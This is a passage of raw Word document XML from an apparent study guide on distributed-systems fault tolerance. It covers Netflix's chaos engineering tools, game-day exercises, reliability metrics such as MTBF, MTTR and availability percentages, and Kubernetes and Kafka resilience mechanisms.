      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="09EECA9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9BC456" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Region failure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C7DFC7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Simulate full region outage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E0822D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>DR procedures, multi-region failover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28DFFA2C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Netflix's Chaos Engineering (Simian Army)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338D3D9B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C81320F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Chaos Monkey:     Kill random instances (hourly, in production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136A3F9F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Chaos Kong:       Simulate entire region failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1765E4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Latency Monkey:   Inject network delays between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACBF56" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Conformity Monkey: Find instances not following best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835021D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Security Monkey:   Find security vulnerabilities/misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749ECB07" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="0ADFCA1A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Result: Netflix services are designed to survive ANY instance/zone failure by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4658F2FB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Because they ACTUALLY experience these failures every day (intentionally).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E4F1D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.4 Game Days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDDF3C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD4CB8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>A "game day" is a planned, scheduled fault tolerance exercise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D4F069" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="54179D26" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>1. Define hypothesis: "If us-east-1a loses power, the service continues with &lt; 30s impact."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F48CB4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>2. Prepare: Ensure monitoring, runbooks, communication channels are ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C69D52" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>3. Execute: Simulate the failure (during business hours, with team ready).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068E3B05" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>4. Observe: Does the system behave as expected?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197AD555" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>5. Document: What worked? What didn't? What needs fixing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1856DF4B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>6. Fix: Address gaps found during the exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C109AD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>7. Repeat: Run regularly (quarterly minimum).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239D0BFD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="2E86E41C">
          <v:rect id="_x0000_i6354" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE1B017" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Fault Tolerance Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2D51A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Key Metrics</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3467"/>
        <w:gridCol w:w="4013"/>
        <w:gridCol w:w="1870"/>
      </w:tblGrid>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="7E6B2D0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A136DA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00476518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Metric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C206DC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00476518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Definition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8E1291" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00476518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Target Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="5908240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AC269C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>MTBF (Mean Time Between Failures)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521540" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Average time between consecutive failures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06055A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="6DFD2A3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5A6A85" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>MTTR (Mean Time To Recovery)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B54B95" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Average time to restore service after failure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214FBF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>5 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="186072F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48E23C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>MTTD (Mean Time To Detect)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1BED71" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Average time to detect a failure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70D322" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>1 minute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="0707088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27C06E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>RTO (Recovery Time Objective)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0E0D1B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Maximum acceptable time to restore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19BA25" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>15 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="6C03A77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DE7916" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>RPO (Recovery Point Objective)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D7FF41" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Maximum acceptable data loss (in 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685EA5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>1 second</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="375E00B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3D9EE2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Availability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0525BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Uptime / (Uptime + Downtime)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856AC6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>99.99%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C4EAE65" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Availability Calculations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618535D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6ED763" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Availability = MTBF / (MTBF + MTTR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49D4D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="6477412D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Example: MTBF = 30 days, MTTR = 30 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0C4BF7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Availability = 30 × 24 × 60 / (30 × 24 × 60 + 30) = 43200 / 43230 = 99.93%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CB1CCB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="331C7E53" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>To improve availability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6727032D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  1. Increase MTBF (prevent failures): better hardware, code quality, testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB1CB0F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  2. Decrease MTTR (recover faster): automation, monitoring, redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C7E600" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF68E3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Decreasing MTTR is usually more cost-effective than increasing MTBF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF7B2F7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Failures are inevitable — recovering fast is the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C999A28" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="7BBB9DB6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Availability levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679E3D42" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  99%     → 3.65 days downtime/year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA10DC7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  99.9%   → 8.7 hours/year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099A6E5A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  99.99%  → 52 minutes/year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04882B1F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  99.999% → 5.2 minutes/year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EAEF1E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  99.9999%→ 31 seconds/year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE44E35" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="07E9D094">
          <v:rect id="_x0000_i6355" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9907EB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Fault Tolerance in Specific Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD192D8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 Kubernetes Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FB4574" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA45CF0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Pod level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E4F4F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Liveness probes → restart unhealthy pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518567A9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Readiness probes → remove unready pods from load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E68FB2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - ReplicaSets → maintain N replicas (recreate on failure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79235635" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Pod Disruption Budgets (PDB) → limit simultaneous disruptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF3872" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="6C155DBB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Node level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB9B37E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Node health monitoring (kubelet heartbeat).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11279343" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Pod eviction from unhealthy nodes (5 min default timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36492471" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Cluster Autoscaler → add nodes when pods can't be scheduled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F07D83F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Node auto-repair (cloud provider replaces unhealthy nodes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFFB084" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="1E23AAAC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Application level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59573F7B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Deployment strategies (rolling update — gradual, rollback on failure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032B37F7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Pod anti-affinity (spread replicas across nodes/zones).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0EAFE3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Topology spread constraints (even distribution across zones).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7E50F0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Resource limits (prevent noisy neighbors, OOM handled gracefully).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF3DDE1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Kafka Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2893E0A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1E06F6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FDF039" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Each partition has multiple replicas across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F580EA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  In-Sync Replicas (ISR): replicas that are caught up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535F726A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB52B72" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  acks=all: producer waits for ALL ISR to acknowledge → no data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34506D36" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  min.insync.replicas=2: at least 2 replicas must be in ISR for writes to succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7A7E52" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524CD120" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Broker failure:</w:t>
      </w:r>
    </w:p>
